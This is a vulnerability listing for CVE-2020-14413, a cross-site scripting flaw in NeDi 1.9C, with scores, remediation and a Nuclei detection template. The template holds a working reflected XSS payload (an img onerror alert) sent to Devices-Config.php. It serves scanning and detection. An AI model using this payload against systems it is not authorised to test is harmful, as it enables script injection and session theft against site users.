Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-14413
HistoryMar 08, 2021 - 5:28 a.m.

NeDi 1.9C - Cross-Site Scripting

2021-03-0805:28:55
ProjectDiscovery
github.com
13
cve
cross-site scripting
vulnerability
nedi
javascript
patched version
security bug
session hijacking

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

40.4%

NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.

id: CVE-2020-14413

info:
  name: NeDi 1.9C - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14413
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-14413
    cwe-id: CWE-79
    epss-score: 0.00095
    epss-percentile: 0.40142
    cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nedi
    product: nedi
  tags: cve,cve2020,nedi,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a25b67d8e501fe54a9736f4b60284269c3b3ce22055d5909a746b02bd595b7d70220335a4d343367dbfe91fedd1ae1344d4196d2a81e16b66e21c40e8d4b548e1827:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

40.4%

Related for NUCLEI:CVE-2020-14413